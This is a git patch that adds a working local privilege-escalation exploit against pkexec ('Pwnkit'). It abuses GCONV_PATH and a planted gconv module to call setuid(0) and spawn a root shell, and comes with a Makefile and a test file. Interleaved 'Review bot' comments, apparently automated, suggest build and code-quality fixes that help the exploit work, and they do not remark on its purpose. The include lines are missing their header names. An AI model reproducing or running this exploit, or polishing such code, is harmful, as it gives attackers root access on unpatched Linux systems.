From 2bc2c0d48a1fcedb6f1d0eaf4c896a366e6e6a1b Mon Sep 17 00:00:00 2001
From: Ruthenic
Date: Wed, 26 Jan 2022 16:48:54 -0500
Subject: [PATCH] Init
---
 .gitignore | 1 +
 Makefile | 13 +++++++
 src/exploit.c | 79 ++++++++++++++++++++++++++++++++++++++++++
 src/testGconvPayload.c | 7 ++++
 4 files changed, 100 insertions(+)
 create mode 100644 .gitignore
 create mode 100644 Makefile
 create mode 100644 src/exploit.c
 create mode 100644 src/testGconvPayload.c
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..1fcb152
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+out
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..22404a1
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,13 @@
+VERSION = "\"0.3.2\\n© Ruthenic, 2021\""
+
+CC ?= gcc
+target ?= $(shell ${CC} -dumpmachine)
+CC_FLAGS ?=
+
+.PHONY: all debug
+all:
+ gcc -shared src/exploit.c -o out/pwnkit.so -Wl,-soname,libservice.so -Wl,-e,main -fPIC
+
+debug: CC_FLAGS:=-g -O0 -v ${CC_FLAGS}
+debug: all
+
diff --git a/src/exploit.c b/src/exploit.c
new file mode 100644
index 0000000..e8266f1
--- /dev/null
+++ b/src/exploit.c
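Review bot: The `all` recipe hardcodes `gcc` and never expands `${CC_FLAGS}`, so the `CC`, `target` and `CC_FLAGS` variables declared above it have no effect, and the target-specific override on the `debug` line changes nothing about what is compiled. `VERSION` is likewise defined but never passed to the compiler. Writing the recipe as `$(CC) $(CC_FLAGS) -shared src/exploit.c -o out/pwnkit.so -Wl,-soname,libservice.so -Wl,-e,main -fPIC` would make the variables and the `debug` target meaningful.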
@@ -0,0 +1,79 @@
+#include
+#include
+#include
+#include
+
+#include
+#include
+#include
+
+const char service_interp[] __attribute__((section(".interp"))) = "/lib64/ld-linux-x86-64.so.2"; //jank to get this working
+
+void print(const char string[]) {
+ fwrite(string, sizeof(char), strlen(string) + 1, stdout);
+ fwrite("\n", sizeof(char), strlen("\n"), stdout);
+}
+
+void gconv() {} //gconv thing
+
+void gconv_init() {
+ print("pwned lol !");
+ setuid(0);
+ seteuid(0);
+ setgid(0);
+ setegid(0);
+ char *shellArgv[] = {"sh", NULL};
+ execv("/bin/sh", shellArgv);
+}
+
+void setup(char *argv[]) {
+ mkdir("GCONV_PATH=.", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
+ mkdir("pwn", S_IRWXU | S_IRWXG | S_IROTH | S_IXOTH);
+ FILE *fp = fopen("GCONV_PATH=./pwn", "w");
+ struct stat buf;
+ fstat(fileno(fp), &buf);
+ fchmod(fileno(fp), buf.st_mode | S_IXUSR | S_IXGRP | S_IXOTH );
+ fclose(fp);
+ system("/bin/cp pwnkit.so pwn/pwnkit.so"); //i cant be fucked
+ fp = fopen("pwn/gconv-modules", "w");
+ char *gconv = "module PWNKIT// INTERNAL pwnkit 2\n"
+ "module INTERNAL PWNKIT// pwnkit 2";
+ fputs(gconv, fp);
+ fclose(fp);
+}
+
+void clean() {
+ remove("GCONV_PATH=./pwn");
+ rmdir("GCONV_PATH=.");
+ remove("pwn/pwnkit.so");
+ remove("pwn/gconv-modules");
+ rmdir("pwn");
+}
+
+void runAndClean(const char *env[], const char *arg[]) {
+ int pid = fork();
+ if (pid == 0) execve("/usr/bin/pkexec", arg, env);
+ else {
+ waitpid(pid, NULL, 0);
+ print("[Pwnkit] Cleaning up..");
+ clean();
+ }
+}
+
+int main(int argc, char *argv[]) {
+ print("[Pwnkit] Setting up directory structure..");
+ setup(argv);
+ print("[Pwnkit] Setting up environment variables..");
+ const char *env[] = {
+ "pwn",
+ "PATH=GCONV_PATH=.",
+ "CHARSET=pwnkit",
+ "SHELL=pwn",
+ "GIO_USE_VFS=",
+ NULL
+ };
+ const char *args[] = { NULL };
+ print("[Pwnkit] Pwning pkexec..");
+ runAndClean(env, args);
+ _exit(0);
+}
diff --git a/src/testGconvPayload.c b/src/testGconvPayload.c
new file mode 100644
index 0000000..82ebed7
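Review bot: `print` writes the string's terminating NUL to stdout: `fwrite(string, sizeof(char), strlen(string) + 1, stdout)` counts the `'\0'` as a character, so every message is followed by a stray NUL byte before the newline. Change the first call to `fwrite(string, sizeof(char), strlen(string), stdout);` (or simply `fputs(string, stdout);`). The `#include` directives in this hunk are rendered without their header names, presumably an artifact of the page, so the set of headers the file relies on cannot be checked from here.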
--- /dev/null
+++ b/src/testGconvPayload.c
@@ -0,0 +1,7 @@
+#include
+#include
+
+int main(void) {
+ putenv("GCONV_PATH=.");
+ FILE *fp = fopen("exploit.c", "r,ccs=pwnkit");
+}
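Review bot: `fp` in `main` is opened but never used or closed, so the `FILE` handle leaks until process exit; add `if (fp) fclose(fp);` before the closing brace. `main` also falls off its end without a `return`, which C99 and later permit for `main` specifically, but an explicit `return 0;` makes the intent clear.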